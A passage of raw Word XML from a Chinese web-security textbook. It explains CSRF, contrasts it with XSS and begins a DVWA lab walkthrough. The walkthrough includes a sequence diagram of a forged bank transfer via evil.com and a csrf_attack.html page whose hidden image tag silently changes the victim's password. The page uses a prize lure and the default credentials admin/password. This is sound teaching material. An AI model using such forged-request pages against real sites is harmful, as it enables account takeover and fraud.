          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">浏览器在发起请求时自动附加目标域的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，服务器无法区分该请求来源于用户主动点击还是被恶意页面触发的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">一个典型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击流程（Mermaid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">序列图，①标准通用原理）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant V as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受害者浏览器</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant B as bank.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant A as evil.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者页面</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> V-&gt;&gt;B: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bank.com，获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session Cookie</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B--&gt;&gt;V: Set-Cookie: session=&lt;SESSION_ID&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over V: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时浏览器持有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> bank.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> V-&gt;&gt;A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">evil.com（或被嵌入的恶意页面）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A--&gt;&gt;V: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回含隐藏表单/自动提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over V: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面自动向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> bank.com/transfer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> V-&gt;&gt;B: POST /transfer?to=attacker&amp;amount=10000&lt;br&gt;Cookie: session=&lt;SESSION_ID&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over B: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器看到合法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie，执行转账</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B--&gt;&gt;V: 200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OK（转账成功）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的本质差异</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。初学者常混淆两者。XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">滥用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对注入脚本的信任</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——攻击者代码在受害者浏览器中执行，可以读取同源下的数据（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、页面内容），属于客户端代码注入。CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">滥用的则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对自动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">附着的信任</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——攻击者无法读取响应内容（同源策略阻止跨站读），只能发起“盲请求”，但可以借受害者的身份实现状态改变操作（②环境相关：现代浏览器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SameSite Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认策略已显著削弱此攻击面，见下文防御框）。一个直观的对比：XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是“让受害者浏览器替攻击者执行脚本”；CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是“让受害者浏览器替攻击者发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元：DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">①目标靶机与搭建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DVWA（Damn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerable Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application，回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场搭建），选择低安全等级（Low）。DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关为经典密码修改功能——用户提交新密码的请求仅依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证，无</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Anti-CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token，构成典型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">②逐步命令与操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP/路径因环境而异②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一：了解目标请求结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。登录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA（默认凭据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin / password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视部署而定②），将安全等级设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Low。进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;DVWA_IP&gt;/vulnerabilities/csrf/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。该页面提供一个简单的密码修改表单。在浏览器的开发者工具（F12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签）下，填入新密码（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">newpass123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）并提交，观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suite（已配置代理拦截，回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch8）中捕获的请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /vulnerabilities/csrf/?password_new=newpass123&amp;password_conf=newpass123&amp;Change=Change HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: &lt;DVWA_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: PHPSESSID=&lt;SESSION_ID&gt;; security=low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②环境相关：DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实际路径可能因部署而异，部分版本使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法。以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA v1.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例，CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法传递密码参数，这一设计本身加剧了漏洞——参数暴露在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，极易被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或链接触发。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤二：构造攻击页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。攻击者（你，在另一台机器或同机不同端口上）构造一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">csrf_attack.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</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Congratulations! You won a prize!</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"http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA_IP&gt;/vulnerabilities/csrf/?password_new=hacked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password_conf=hacked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Change=Change"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"display:none;"</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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（③概念示意：此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅用于教学证明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“盲请求”本质。真实攻击中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性会触发浏览器对该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，自动携带目标域</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只能发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GET，更复杂的攻击需借助自动提交的隐藏表单以构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，此处为教学最小示例。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤三：触发攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。将</w:t>
      </w:r>
